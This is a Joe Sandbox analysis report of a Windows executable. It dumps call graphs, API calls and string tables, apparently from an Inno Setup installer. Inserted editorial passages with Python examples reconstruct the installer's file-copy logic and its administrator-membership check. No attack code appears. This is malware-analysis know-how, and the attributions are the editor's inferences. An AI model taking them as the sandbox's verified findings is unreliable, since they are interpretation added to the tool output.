60529->60534 60553 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60529->60553 60530->60529 60552 408d34 19 API calls 60530->60552 60532 4213ca 60539 4213de SetMenu 60532->60539 60549 4213a3 60532->60549 60533 421332 60538 4213a5 60533->60538 60543 42134d 60533->60543 60534->60532 60534->60533 60535 4213f6 60556 4211cc 10 API calls 60535->60556 60541 4213b9 60538->60541 60538->60549 60539->60549 60540 4213fd 60540->60527 60551 4221f8 10 API calls 60540->60551 60544 4213c2 SetMenu 60541->60544 60545 421370 GetMenu 60543->60545 60543->60549 60544->60549 60546 421393 60545->60546 60547 42137a 60545->60547 60554 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60546->60554 60550 42138d SetMenu 60547->60550 60549->60535 60555 421e3c 11 API calls 60549->60555 60550->60546 60551->60527 60552->60530 60553->60534 60554->60549 60555->60535 60556->60540 53118 2302127 53119 2302130 53118->53119 53120 230210a 53119->53120 53121 45cff4 5 API calls 53119->53121 53121->53120 60557 44acfc 60558 44ad0a 60557->60558 60560 44ad29 60557->60560 60559 44abe0 11 API calls 60558->60559 60558->60560 60559->60560 60561 447f7c 60562 447fb1 60561->60562 60563 447faa 60561->60563 60564 447fd0 60562->60564 60565 447fba 60562->60565 60566 403400 4 API calls 60563->60566 60568 403494 4 API calls 60564->60568 60607 447d80 7 API calls 60565->60607 60569 44815b 60566->60569 60571 447fde 60568->60571 60570 447fc5 60570->60564 60572 447fc9 60570->60572 60573 4037b8 4 API calls 60571->60573 60572->60563 60574 447ffa 60573->60574 60575 4037b8 4 API calls 60574->60575 60576 448016 60575->60576 60576->60563 60577 44802a 60576->60577 60578 4037b8 4 API calls 60577->60578 60579 448044 60578->60579 60580 431424 4 API calls 60579->60580 60581 448066 60580->60581 60582 4314f4 4 API calls 60581->60582 60589 448086 60581->60589 60582->60581 60583 4480dc 60596 441b88 60583->60596 60584 4480c4 60584->60583 60609 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60584->60609 60588 448110 GetLastError 
60610 447d14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60588->60610 60589->60584 60608 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60589->60608 60591 44811f 60611 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60591->60611 60593 448134 60612 442e74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60593->60612 60595 44813c 60597 442b66 60596->60597 60598 441bc1 60596->60598 60600 403400 4 API calls 60597->60600 60599 403400 4 API calls 60598->60599 60601 441bc9 60599->60601 60602 442b7b 60600->60602 60603 431424 4 API calls 60601->60603 60602->60588 60604 441bd5 60603->60604 60605 442b56 60604->60605 60613 441260 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60604->60613 60605->60588 60607->60570 60608->60589 60609->60583 60610->60591 60611->60593 60612->60595 60613->60604 60614 47ef3e 60615 450664 5 API calls 60614->60615 60616 47ef52 60615->60616 60617 47e064 21 API calls 60616->60617 60618 47ef76 60617->60618 53122 48fed4 53123 48ff0e 53122->53123 53124 48ff1a 53123->53124 53125 48ff10 53123->53125 53127 48ff29 53124->53127 53128 48ff52 53124->53128 53317 4090a0 MessageBeep 53125->53317 53130 44684c 18 API calls 53127->53130 53135 48ff8a 53128->53135 53136 48ff61 53128->53136 53129 403420 4 API calls 53131 490566 53129->53131 53132 48ff36 53130->53132 53133 403400 4 API calls 53131->53133 53318 406bb8 53132->53318 53137 49056e 53133->53137 53143 48ff99 53135->53143 53144 48ffc2 53135->53144 53139 44684c 18 API calls 53136->53139 53140 48ff6e 53139->53140 53326 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53140->53326 53146 44684c 18 API calls 53143->53146 53149 48ffea 53144->53149 53150 48ffd1 53144->53150 53145 48ff79 53327 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53145->53327 53148 48ffa6 53146->53148 53328 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53148->53328 53157 48fff9 53149->53157 53158 49001e 53149->53158 53330 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 
53150->53330 53153 48ffb1 53329 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53153->53329 53154 48ffd9 53331 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53154->53331 53159 44684c 18 API calls 53157->53159 53161 49002d 53158->53161 53162 490056 53158->53162 53160 490006 53159->53160 53332 4072b0 53160->53332 53164 44684c 18 API calls 53161->53164 53170 49008e 53162->53170 53171 490065 53162->53171 53166 49003a 53164->53166 53165 49000e 53335 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53165->53335 53336 42c7d0 53166->53336 53168 48ff15 53168->53129 53177 4900da 53170->53177 53178 49009d 53170->53178 53173 44684c 18 API calls 53171->53173 53174 490072 53173->53174 53346 407200 8 API calls 53174->53346 53183 4900e9 53177->53183 53184 490112 53177->53184 53180 44684c 18 API calls 53178->53180 53179 49007d 53347 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53179->53347 53182 4900ac 53180->53182 53185 44684c 18 API calls 53182->53185 53186 44684c 18 API calls 53183->53186 53191 49014a 53184->53191 53192 490121 53184->53192 53187 4900bd 53185->53187 53188 4900f6 53186->53188 53348 48fbd8 8 API calls 53187->53348 53350 42c870 53188->53350 53200 490159 53191->53200 53201 490182 53191->53201 53195 44684c 18 API calls 53192->53195 53193 4900c9 53349 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53193->53349 53197 49012e 53195->53197 53356 42c898 53197->53356 53203 44684c 18 API calls 53200->53203 53206 4901ba 53201->53206 53207 490191 53201->53207 53205 490166 53203->53205 53365 42c8c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53205->53365 53214 4901c9 53206->53214 53215 4901f2 53206->53215 53209 44684c 18 API calls 53207->53209 53211 49019e 53209->53211 53210 490171 53366 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53210->53366 53367 42c8f8 53211->53367 53217 44684c 18 API calls 53214->53217 53220 49023e 53215->53220 53221 
490201 53215->53221 53219 4901d6 53217->53219 53373 42c920 53219->53373 53227 49024d 53220->53227 53228 490290 53220->53228 53224 44684c 18 API calls 53221->53224 53226 490210 53224->53226 53229 44684c 18 API calls 53226->53229 53230 44684c 18 API calls 53227->53230 53236 49029f 53228->53236 53237 490303 53228->53237 53231 490221 53229->53231 53232 490260 53230->53232 53379 42c4c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53231->53379 53234 44684c 18 API calls 53232->53234 53238 490271 53234->53238 53235 49022d 53380 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53235->53380 53240 44684c 18 API calls 53236->53240 53243 490342 53237->53243 53244 490312 53237->53244 53381 48fdd0 12 API calls 53238->53381 53241 4902ac 53240->53241 53309 42c5d4 7 API calls 53241->53309 53255 490381 53243->53255 53256 490351 53243->53256 53247 44684c 18 API calls 53244->53247 53246 49027f 53382 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53246->53382 53250 49031f 53247->53250 53248 4902ba 53251 4902be 53248->53251 53252 4902f3 53248->53252 53385 451f68 53250->53385 53254 44684c 18 API calls 53251->53254 53384 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53252->53384 53259 4902cd 53254->53259 53264 4903c0 53255->53264 53265 490390 53255->53265 53260 44684c 18 API calls 53256->53260 53258 49032c 53392 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53258->53392 53310 4522e0 53259->53310 53263 49035e 53260->53263 53393 451dd0 53263->53393 53274 490408 53264->53274 53275 4903cf 53264->53275 53268 44684c 18 API calls 53265->53268 53266 4902dd 53383 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53266->53383 53271 49039d 53268->53271 53270 49036b 53400 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53270->53400 53401 452470 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53271->53401 53281 
[Execution graph: interactive control-flow/call graph rendered on the original page; the flattened node and edge dump is omitted here. Functions named on graph-node labels: BZ2_bzDecompressInit, CharNextA, CharPrevA, CreateDirectoryA, CreateWindowExA, DeleteFileA, EnableMenuItem, FileTimeToSystemTime, FormatMessageA, GetActiveWindow, GetCursor, GetEnvironmentVariableA, GetFileAttributesA, GetFocus, GetFullPathNameA, GetLastError, GetSystemDirectoryA, GetSystemMenu, GetSystemTimeAsFileTime, GetWindowsDirectoryA, GetWindowTextA, IsDBCSLeadByte, LoadCursorA, LoadStringA, LocalAlloc, MoveFileA, RegCloseKey, RegisterClassA, RegOpenKeyExA, RegQueryValueExA, SelectObject, SendMessageA, SetActiveWindow, SetCurrentDirectoryA, SetCursor, SetFocus, SetLastError, ShowWindow, Sleep, TlsGetValue, TlsSetValue, VariantClear, VirtualAlloc, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection. Two nodes call external addresses, 73A15CF0 and 73A0A570.]
                                                                          Strings
                                                                          • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                          • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                          • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                          • Same version. Skipping., xrefs: 0046FCC9
                                                                          • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                          • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                          • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                          • Will register the file (a type library) later., xrefs: 004704D0
                                                                          • Version of existing file: (none), xrefs: 0046FCDE
                                                                          • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                          • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                          • Stripped read-only attribute., xrefs: 0046FEAB
                                                                          • Dest filename: %s, xrefs: 0046F878
                                                                          • Installing into GAC, xrefs: 004706D1
                                                                          • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                          • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                          • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                          • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                          • InUn, xrefs: 00470129
                                                                          • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                          • Version of our file: (none), xrefs: 0046FAE0
                                                                          • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                          • Time stamp of our file: %s, xrefs: 0046F97F
                                                                          • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                          • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                          • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                          • Installing the file., xrefs: 0046FEED
                                                                          • @, xrefs: 0046F794
                                                                          • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                          • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                          • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                          • Same time stamp. Skipping., xrefs: 0046FD39
                                                                          • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                          • .tmp, xrefs: 0046FF9B
                                                                          • Dest file exists., xrefs: 0046F99F
                                                                          • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                          • -- File entry --, xrefs: 0046F6DF
                                                                          • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                          • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                          • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                          • API String ID: 0-4021121268
                                                                          • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                          • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                          • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                          • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A
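The strings listed for this routine ("-- File entry --", the "onlyifdoesntexist" / "onlyifdestfileexists" flag messages, "Incrementing shared file count", "Will register the file (a DLL/OCX) later.") are log messages from the Inno Setup installer runtime's file-entry processing, so this function is the installer's own copy-or-skip logic rather than payload code; that identification is the editor's, not the report's. When a report lists strings with their xref addresses, sorting them by address recovers the order in which a straight-line Delphi routine emits them, which is a quick way to reconstruct its decision sequence without opening the disassembly. The following Python is an added example, not code from the sample or from Joe Sandbox; its input is a constructed subset of the Strings list above, and the Inno Setup marker list is the editor's choice of distinctive messages.

```python
"""Recover the emission order of a routine's log strings from the
"text, xrefs: address" lines of a sandbox report.  Added example; the input
below is a constructed subset of the report's Strings list."""
import re

# Constructed from the report's Strings list (verbatim text, subset).
STRINGS_BLOCK = """\
• Incrementing shared file count (64-bit)., xrefs: 00470549
• Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
• Same version. Skipping., xrefs: 0046FCC9
• , xrefs: 0046FBB3, 0046FD84, 0046FE02
• Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
• Dest filename: %s, xrefs: 0046F878
• Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
• Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
• Dest file exists., xrefs: 0046F99F
• -- File entry --, xrefs: 0046F6DF
• Installing the file., xrefs: 0046FEED
"""

# One bullet per line: text, then ", xrefs: " and one or more 8-digit hex addresses.
LINE_RE = re.compile(
    r"^•\s*(?P<text>.*?),\s*xrefs:\s*"
    r"(?P<xrefs>[0-9A-Fa-f]{8}(?:\s*,\s*[0-9A-Fa-f]{8})*)\s*$"
)

# Log messages from Inno Setup's Install.pas (editor's selection); seeing them
# means the surrounding file-handling code belongs to the installer runtime.
INNO_SETUP_MARKERS = (
    "-- File entry --",
    'Skipping due to "onlyifdoesntexist" flag.',
    'Skipping due to "onlyifdestfileexists" flag.',
    "Incrementing shared file count",
    "Will register the file (a DLL/OCX) later.",
)


def parse_xref_strings(block: str) -> list[tuple[int, str]]:
    """Return (address, text) pairs, one per xref, so a string referenced
    from several sites appears once per site."""
    pairs = []
    for line in block.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # not a string bullet; ignore headers and blank lines
        text = match.group("text")
        for addr in match.group("xrefs").split(","):
            pairs.append((int(addr.strip(), 16), text))
    return pairs


def emission_order(block: str) -> list[str]:
    """Strings sorted by the address of the referencing code; empty strings
    (format separators) are dropped.  Addresses are unique, so the sort never
    falls back to comparing text."""
    return [text for _, text in sorted(parse_xref_strings(block)) if text]


def is_inno_setup_routine(block: str) -> bool:
    """True if any parsed string starts with one of the marker messages."""
    texts = {text for _, text in parse_xref_strings(block)}
    return any(text.startswith(marker) for text in texts for marker in INNO_SETUP_MARKERS)


if __name__ == "__main__":
    for text in emission_order(STRINGS_BLOCK):
        print(text)
    print("Inno Setup runtime:", is_inno_setup_routine(STRINGS_BLOCK))
```

Run on the full Strings list, the sorted output reads as the routine's checks in order: bitness and WFP status, existence and the onlyifdoesntexist flag, time stamps, versions, SHA-1 comparison, read-only handling, then "Installing the file." and the shared-count bookkeeping.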

                                                                          Control-flow Graph

                                                                          control_flow_graph 1530 42dfc4-42dfd5 1531 42dfe0-42e005 AllocateAndInitializeSid 1530->1531 1532 42dfd7-42dfdb 1530->1532 1533 42e1af-42e1b7 1531->1533 1534 42e00b-42e028 GetVersion 1531->1534 1532->1533 1535 42e041-42e043 1534->1535 1536 42e02a-42e03f GetModuleHandleA GetProcAddress 1534->1536 1537 42e045-42e053 CheckTokenMembership 1535->1537 1538 42e06a-42e084 GetCurrentThread OpenThreadToken 1535->1538 1536->1535 1539 42e191-42e1a7 FreeSid 1537->1539 1540 42e059-42e065 1537->1540 1541 42e086-42e090 GetLastError 1538->1541 1542 42e0bb-42e0e3 GetTokenInformation 1538->1542 1540->1539 1543 42e092-42e097 call 4031bc 1541->1543 1544 42e09c-42e0af GetCurrentProcess OpenProcessToken 1541->1544 1545 42e0e5-42e0ed GetLastError 1542->1545 1546 42e0fe-42e122 call 402648 GetTokenInformation 1542->1546 1543->1533 1544->1542 1549 42e0b1-42e0b6 call 4031bc 1544->1549 1545->1546 1550 42e0ef-42e0f9 call 4031bc * 2 1545->1550 1556 42e130-42e138 1546->1556 1557 42e124-42e12e call 4031bc * 2 1546->1557 1549->1533 1550->1533 1561 42e13a-42e13b 1556->1561 1562 42e16b-42e189 call 402660 CloseHandle 1556->1562 1557->1533 1566 42e13d-42e150 EqualSid 1561->1566 1562->1539 1569 42e152-42e15f 1566->1569 1570 42e167-42e169 1566->1570 1569->1570 1572 42e161-42e165 1569->1572 1570->1562 1570->1566 1572->1562
                                                                          APIs
                                                                          • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                          • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                          • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                          • API String ID: 2252812187-1888249752
                                                                          • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                          • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                          • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                          • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69
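The API sequence recorded for the routine at 42dfc4 is the standard "is the caller a local Administrator" check: AllocateAndInitializeSid with two sub-authorities, 0x20 (SECURITY_BUILTIN_DOMAIN_RID) and 0x220 (DOMAIN_ALIAS_RID_ADMINS), builds the SID S-1-5-32-544; GetVersion gates a GetProcAddress lookup of CheckTokenMembership in advapi32.dll; and the graph's other branch (GetCurrentThread/OpenThreadToken, GetLastError, OpenProcessToken, two GetTokenInformation calls, an EqualSid loop, CloseHandle) is the fallback that walks TOKEN_GROUPS by hand on systems without CheckTokenMembership. The identifier authority behind the first argument (00498788) is not shown in the report and is assumed below to be SECURITY_NT_AUTHORITY (5), which is the only value that makes the two RIDs meaningful. The Python below is an added example written for this report, not code from the sample: it lays out the SID bytes exactly as AllocateAndInitializeSid does, renders the SID string, and models the fallback loop offline with constructed token-group lists. The practitioner's caveat it demonstrates is that a UAC-filtered token still carries the Administrators SID, flagged SE_GROUP_USE_FOR_DENY_ONLY, so a fallback that only calls EqualSid would report "admin" for a medium-integrity process; the attribute mask used here is the standard one and is an assumption, since the report does not show the comparison at 42e152.

```python
"""Model of the local-Administrators membership check behind the
AllocateAndInitializeSid / CheckTokenMembership / GetTokenInformation /
EqualSid call chain.  Added example; the Win32 calls are modelled in pure
Python, not invoked, so this runs anywhere."""
import struct

# Well-known constants from winnt.h.
SECURITY_NT_AUTHORITY = 5            # assumed contents of the authority at 00498788
SECURITY_BUILTIN_DOMAIN_RID = 0x20   # first sub-authority in the recorded call
DOMAIN_ALIAS_RID_ADMINS = 0x220      # second sub-authority in the recorded call
DOMAIN_ALIAS_RID_USERS = 0x221
SE_GROUP_ENABLED = 0x00000004
SE_GROUP_USE_FOR_DENY_ONLY = 0x00000010
SID_REVISION = 1
SID_MAX_SUB_AUTHORITIES = 15


def build_sid(identifier_authority: int, sub_authorities: list[int]) -> bytes:
    """Binary SID as AllocateAndInitializeSid lays it out: revision byte,
    sub-authority count, 6-byte big-endian identifier authority, then one
    little-endian DWORD per sub-authority."""
    if not 1 <= len(sub_authorities) <= SID_MAX_SUB_AUTHORITIES:
        raise ValueError("sub-authority count out of range")
    head = struct.pack("<BB", SID_REVISION, len(sub_authorities))
    authority = identifier_authority.to_bytes(6, "big")
    subs = b"".join(struct.pack("<I", s) for s in sub_authorities)
    return head + authority + subs


def parse_sid(blob: bytes) -> tuple[int, list[int]]:
    """Inverse of build_sid.  Length is validated so a truncated SID is
    rejected rather than silently compared."""
    if len(blob) < 8:
        raise ValueError("SID too short")
    revision, count = struct.unpack_from("<BB", blob, 0)
    if revision != SID_REVISION or not 1 <= count <= SID_MAX_SUB_AUTHORITIES:
        raise ValueError("bad SID header")
    if len(blob) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(blob[2:8], "big")
    subs = list(struct.unpack_from("<%dI" % count, blob, 8))
    return authority, subs


def sid_to_string(blob: bytes) -> str:
    """Render in the S-1-<authority>-<sub>-<sub>... form used by whoami and SDDL."""
    authority, subs = parse_sid(blob)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def equal_sid(a: bytes, b: bytes) -> bool:
    """EqualSid compares the whole structure; both sides must parse and match."""
    return parse_sid(a) == parse_sid(b)


def is_member_fallback(token_groups: list[tuple[bytes, int]], wanted: bytes) -> bool:
    """The pre-CheckTokenMembership path: walk TOKEN_GROUPS and accept only an
    entry that is enabled and not deny-only.  Without the attribute test the
    Administrators SID in a UAC-filtered token would count as membership."""
    for sid, attributes in token_groups:
        if equal_sid(sid, wanted) and (
            attributes & (SE_GROUP_ENABLED | SE_GROUP_USE_FOR_DENY_ONLY)
        ) == SE_GROUP_ENABLED:
            return True
    return False


ADMINS_SID = build_sid(SECURITY_NT_AUTHORITY,
                       [SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS])
USERS_SID = build_sid(SECURITY_NT_AUTHORITY,
                      [SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_USERS])
EVERYONE_SID = build_sid(1, [0])  # S-1-1-0, World authority

# Constructed token-group lists standing in for GetTokenInformation(TokenGroups).
ELEVATED_TOKEN = [(EVERYONE_SID, SE_GROUP_ENABLED), (ADMINS_SID, SE_GROUP_ENABLED)]
FILTERED_TOKEN = [(EVERYONE_SID, SE_GROUP_ENABLED), (USERS_SID, SE_GROUP_ENABLED),
                  (ADMINS_SID, SE_GROUP_USE_FOR_DENY_ONLY)]

if __name__ == "__main__":
    print(sid_to_string(ADMINS_SID))                       # S-1-5-32-544
    print(is_member_fallback(ELEVATED_TOKEN, ADMINS_SID))  # True
    print(is_member_fallback(FILTERED_TOKEN, ADMINS_SID))  # False
```

For a sample this means the routine only reports whether the current token is an enabled member of BUILTIN\Administrators; it does not elevate. The "Uninstaller requires administrator" string in the neighbouring routine is the consumer of this result.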

                                                                          Control-flow Graph

                                                                          control_flow_graph 1860 423c1c-423c50 1861 423c52-423c53 1860->1861 1862 423c84-423c9b call 423b78 1860->1862 1863 423c55-423c71 call 40b44c 1861->1863 1868 423cfc-423d01 1862->1868 1869 423c9d 1862->1869 1891 423c73-423c7b 1863->1891 1892 423c80-423c82 1863->1892 1870 423d03 1868->1870 1871 423d37-423d3c 1868->1871 1872 423ca3-423ca6 1869->1872 1873 423d60-423d70 1869->1873 1881 423fc1-423fc9 1870->1881 1882 423d09-423d11 1870->1882 1876 423d42-423d45 1871->1876 1877 4240aa-4240b8 IsIconic 1871->1877 1874 423cd5-423cd8 1872->1874 1875 423ca8 1872->1875 1879 423d72-423d77 1873->1879 1880 423d7b-423d83 call 4241a4 1873->1880 1887 423db9-423dc0 1874->1887 1888 423cde-423cdf 1874->1888 1883 423e06-423e16 call 423b94 1875->1883 1884 423cae-423cb1 1875->1884 1885 4240e6-4240fb call 424860 1876->1885 1886 423d4b-423d4c 1876->1886 1889 424162-42416a 1877->1889 1896 4240be-4240c9 GetFocus 1877->1896 1893 423d88-423d90 call 4241ec 1879->1893 1894 423d79-423d9c call 423b94 1879->1894 1880->1889 1881->1889 1890 423fcf-423fda call 4181f0 1881->1890 1897 423f23-423f4a SendMessageA 1882->1897 1898 423d17-423d1c 1882->1898 1883->1889 1899 423cb7-423cba 1884->1899 1900 423e2e-423e4a PostMessageA call 423b94 1884->1900 1885->1889 1910 423d52-423d55 1886->1910 1911 4240fd-424104 1886->1911 1887->1889 1902 423dc6-423dcd 1887->1902 1903 423ce5-423ce8 1888->1903 1904 423f4f-423f56 1888->1904 1909 424181-424187 1889->1909 1890->1889 1945 423fe0-423fef call 4181f0 IsWindowEnabled 1890->1945 1891->1909 1892->1862 1892->1863 1893->1889 1894->1889 1896->1889 1915 4240cf-4240d8 call 41f004 1896->1915 1897->1889 1906 423d22-423d23 1898->1906 1907 42405a-424065 1898->1907 1918 423cc0-423cc3 1899->1918 1919 423eb5-423ebc 1899->1919 1900->1889 1902->1889 1923 423dd3-423dd9 1902->1923 1924 423cee-423cf1 1903->1924 1925 423e4f-423e6f call 423b94 1903->1925 1904->1889 1934 423f5c-423f61 call 404e54 1904->1934 1927 
